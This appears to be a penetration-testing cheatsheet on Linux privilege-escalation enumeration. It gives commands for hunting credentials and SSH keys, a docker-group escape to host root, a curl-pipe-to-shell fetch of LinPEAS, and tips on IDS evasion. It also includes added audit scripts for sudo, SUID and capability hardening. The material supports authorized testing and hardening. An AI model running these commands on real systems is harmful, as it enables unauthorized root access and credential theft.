🛡️ Methodology Checklist

  • Run LinPEAS: ./linpeas.sh | tee linpeas.out
  • OS/kernel version: uname -a; cat /etc/os-release
  • Current user context: id; whoami; groups
  • Sudo rights: sudo -l
  • SUID/SGID binaries: find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
  • World-writable files in sensitive paths
  • Cron jobs: cat /etc/crontab; ls /etc/cron.*
  • Running processes as root: ps aux | grep root
  • Open internal ports: ss -tlnp
  • Config files, history, SSH keys with credentials

🎯 Operational Context

Use when: Linux shell obtained — systematic enumeration to identify privilege escalation paths before attempting exploits.

Think Dumber First: Run LinPEAS first. Host it from your own machine (python3 -m http.server) and fetch it with curl http://[LHOST]/linpeas.sh | sh. LinPEAS highlights high-probability privesc paths in red; read the red output first. Then check sudo -l and find / -perm -4000 -type f 2>/dev/null.

Skip when: Already root — no privesc needed.


⚡ Tactical Cheatsheet

Command | Tactical Outcome
--- | ---
whoami; id; hostname; ip a | Basic orientation — who, groups, where
sudo -l | Check sudo rights → cross-ref GTFOBins immediately
cat /etc/os-release; uname -a | OS + kernel version for CVE lookup
env; echo $PATH | Environment variables (creds?) + writable PATH dirs
grep "sh$" /etc/passwd | Users with login shells
cat /etc/fstab; lsblk; df -h | Mounted filesystems, block devices, unmounted drives
arp -a; route; netstat -rn | Network neighbors + routing for pivot targets
find / -type f -name ".*" 2>/dev/null \| grep [USER] | Hidden files under paths containing the target user's name
ls -la /tmp /var/tmp /dev/shm | World-writable temp dirs
grep -E 'DB_USER|DB_PASSWORD' /var/www/html/wp-config.php | WordPress DB creds (alternation needs -E)
grep -riP "password|pwd|db_auth" /var/www/html/ 2>/dev/null | Recursive cred hunt in web root
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | System-wide config file hunt
find / -name "id_rsa" -o -name "id_dsa" 2>/dev/null | SSH private key hunt
cat ~/.bash_history; cat ~/.ssh/known_hosts | Command history + lateral movement targets
find / -name "*.bak" -o -name "*.old" 2>/dev/null | Backup files with stale creds
find / -writable 2>/dev/null \| grep -v proc | Writable files/dirs (PATH abuse targets)

🔬 Deep Dive & Workflow

Initial Enumeration Priority Order

1. sudo -l → GTFOBins → instant privesc if NOPASSWD exists
2. id → check: sudo, lxd, docker, adm, disk groups
3. uname -a → kernel version → searchsploit → kernel exploit (last resort)
4. env / printenv → API keys, DB passwords in environment
5. cat ~/.bash_history → passwords typed at CLI
6. cat /etc/crontab; ls /etc/cron.d/ → scheduled root tasks
7. find / \( -name "*.conf" -o -name "*.bak" -o -name "id_rsa" \) 2>/dev/null → config, backup and key files
8. Web roots: /var/www/html → wp-config.php, .env, config.php

Privileged Group Membership

Group | PrivEsc Path
--- | ---
sudo | sudo -l → GTFOBins
docker | docker run -v /:/mnt --rm -it alpine chroot /mnt sh → root on host
lxd | LXD container escape → mount host root
disk | Read raw disk → access /etc/shadow
adm | Read system logs → find creds
shadow | Read /etc/shadow → crack hashes
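Steps 1 and 2 of the priority order above (sudo -l, then group membership) have a direct defensive counterpart: audit the sudoers policy for NOPASSWD rules and list who sits in the groups the table treats as root-equivalent, before an attacker enumerates them. The script below is an added example, not part of the original cheatsheet. It takes sudoers-style and /etc/group-style text as string arguments and ships with constructed samples so it runs offline; the function names and the PRIV_GROUPS list (the groups from the table) are assumptions for the example.

```shell
#!/bin/sh
# Added audit example (not from the original page): flag NOPASSWD sudo rules
# and members of privileged groups. Input is passed as text so the same
# functions run against constructed samples or real files.

# Constructed sudoers-style sample (not taken from a real host).
SAMPLE_SUDOERS='# sample sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/vim, /usr/bin/systemctl restart app
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(ALL) /usr/bin/apt-get'

# Constructed /etc/group sample.
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,alice
sudo:x:27:alice
shadow:x:42:
disk:x:6:
docker:x:999:bob,carol
lxd:x:998:bob
users:x:100:alice,bob,carol'

# Groups the cheatsheet lists as direct paths to root (assumed policy list).
PRIV_GROUPS="sudo docker lxd disk adm shadow"

# Print every non-comment sudoers line that grants NOPASSWD, one per line.
sudoers_nopasswd() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep 'NOPASSWD'
}

# Print "group:member" for each member of a group listed in PRIV_GROUPS.
privileged_group_members() {
    printf '%s\n' "$1" | while IFS=: read -r name pw gid members; do
        for g in $PRIV_GROUPS; do
            [ "$name" = "$g" ] || continue
            [ -n "$members" ] || continue
            printf '%s\n' "$members" | tr ',' '\n' | while read -r m; do
                printf '%s:%s\n' "$name" "$m"
            done
        done
    done
}

# Total number of findings, usable as a gate in a hardening pipeline.
count_findings() {
    n1=$(sudoers_nopasswd "$1" | wc -l | tr -d ' ')
    n2=$(privileged_group_members "$2" | wc -l | tr -d ' ')
    echo $((n1 + n2))
}

main() {
    echo "== NOPASSWD sudo rules =="
    sudoers_nopasswd "$SAMPLE_SUDOERS"
    echo "== privileged group membership =="
    privileged_group_members "$SAMPLE_GROUP"
    echo "findings: $(count_findings "$SAMPLE_SUDOERS" "$SAMPLE_GROUP")"
}
main
```

Against a real host, feed it the actual policy: sudoers_nopasswd "$(cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null)" and privileged_group_members "$(cat /etc/group)". The sudoers parsing is line-based and ignores aliases and @include directives, so treat it as a first pass that complements, rather than replaces, visudo -c and sudo -l.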

SSH Key Exploitation

# Find private key
find / -name "id_rsa" 2>/dev/null
cat ~/.ssh/known_hosts          # reveals lateral movement targets
 
# Use discovered key
chmod 600 id_rsa
ssh [USER]@[TARGET_IP] -i id_rsa
 
# known_hosts entries may be hashed (HashKnownHosts yes): they are HMAC-SHA1 values, so they can only be brute-forced with a hostname list, e.g. with hashcat

Temp Directory Stability

  • /tmp — deleted on reboot or after 10 days (use for quick payloads)
  • /var/tmp — persists through reboots, 30 days (use for persistence)
  • /dev/shm — RAM-based, fast, no disk writes (IDS evasion)

Defense Awareness

# Check for AppArmor (profiles can confine a process even after it runs as root)
aa-status 2>/dev/null || ls /etc/apparmor.d/
 
# Check for SELinux
sestatus
 
# Check firewall rules
iptables -L; ufw status

🛠️ Troubleshooting & Edge Cases

Problem | Cause | Fix
--- | --- | ---
LinPEAS fails to download | No internet from target | Transfer it via another file transfer method, or run the manual checks: sudo -l, SUID find, cron check
LinPEAS output too long | Terminal scrollback limited | Redirect: linpeas.sh 2>&1 \| tee /tmp/lp.txt, then search the file offline
sudo -l requires password | Interactive sudo needs auth | Current user can still check the sudo version for CVE-2021-3156 (sudo heap overflow)
SUID binary found but not exploitable | Non-standard binary | Check GTFOBins (https://gtfobins.github.io/) for every SUID binary found
No obvious privesc path | Enumeration complete, nothing obvious | Check writable cron directories, writable service files, NFS no_root_squash, and capabilities (getcap -r / 2>/dev/null)
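The last row's checklist (writable cron directories, writable service files, file capabilities) plus the SUID search from the methodology checklist map onto a repeatable hardening check. The script below is an added example, not from the original page: it reports SUID/SGID files missing from an allowlist, world-writable entries under cron and systemd unit directories, and getcap-style lines that grant root-equivalent capabilities. It builds a constructed scratch tree with mktemp and uses a constructed getcap sample so it runs offline; the baseline list, the DANGEROUS_CAPS set and all function names are assumptions for the example.

```shell
#!/bin/sh
# Added hardening check (not the cheatsheet's own code). Three functions cover
# the "no obvious privesc path" list: SUID/SGID drift against a baseline,
# world-writable cron/systemd paths, and root-equivalent file capabilities.
# A mktemp scratch tree and a constructed getcap sample stand in for the real
# filesystem; pass "/" and real getcap -r output to audit a host.

# Capabilities that are effectively root when set on a binary (assumed list).
DANGEROUS_CAPS="cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module"

# Constructed sample of getcap -r output (paths are illustrative).
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3 cap_setuid=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/diag cap_dac_read_search=ep'

# Build a throwaway tree: one expected SUID file, one unexpected SUID file,
# a world-writable cron.d directory and a world-writable unit file.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/usr/bin" "$root/etc/cron.d" "$root/etc/systemd/system"
    : > "$root/usr/bin/passwd";        chmod 4755 "$root/usr/bin/passwd"
    : > "$root/usr/bin/backup-helper"; chmod 4755 "$root/usr/bin/backup-helper"
    : > "$root/etc/cron.d/nightly";    chmod 644  "$root/etc/cron.d/nightly"
    chmod 777 "$root/etc/cron.d"
    : > "$root/etc/systemd/system/app.service"
    chmod 666 "$root/etc/systemd/system/app.service"
    printf '%s\n' "$root"
}

# SUID/SGID regular files under $1 whose path relative to $1 is not in the
# space-separated baseline $2. Note -type f and the grouped -perm tests.
suid_not_in_baseline() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while read -r f; do
        rel="${f#"$1"}"
        case " $2 " in *" $rel "*) ;; *) printf '%s\n' "$rel" ;; esac
    done
}

# World-writable files or directories under the scheduler paths, relative to $1.
writable_sched_paths() {
    find "$1/etc/cron.d" "$1/etc/systemd/system" -perm -002 2>/dev/null |
    sed "s|^$1||" | sort
}

# getcap-style lines that grant any capability in DANGEROUS_CAPS.
dangerous_caps() {
    printf '%s\n' "$1" | while read -r line; do
        for c in $DANGEROUS_CAPS; do
            case "$line" in *"$c"*) printf '%s\n' "$line"; break ;; esac
        done
    done
}

main() {
    root=$(make_sample_tree) || exit 1
    echo "== SUID/SGID files not in baseline =="
    suid_not_in_baseline "$root" "/usr/bin/passwd /usr/bin/sudo /usr/bin/su"
    echo "== world-writable cron/systemd paths =="
    writable_sched_paths "$root"
    echo "== root-equivalent file capabilities =="
    dangerous_caps "$SAMPLE_GETCAP"
    rm -rf "$root"
}
main
```

The baseline is deliberately a short allowlist you maintain per image: the value of the check is the diff over time, so store the first clean run's output and alert on anything new. The capability match is a substring test on getcap's text, which works for both the newer "path cap=ep" and older "path = cap+ep" output styles.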

📝 Reporting Trigger

Finding Title: Linux Privilege Escalation Vector Identified via System Enumeration

Impact: Systematic post-exploitation enumeration identifies misconfigured permissions, SUID binaries, writable service files, or insecure sudo rules that allow a low-privileged user to escalate to root without additional exploitation.

Root Cause: System not hardened to CIS Linux Benchmark standards. Misconfigured permissions, excessive SUID binaries, or insecure sudo rules deployed without security review.

Recommendation: Apply CIS Linux Benchmark hardening. Remove unnecessary SUID/SGID bits. Audit sudo rules for NOPASSWD and unsafe commands. Implement regular Linux hardening assessments.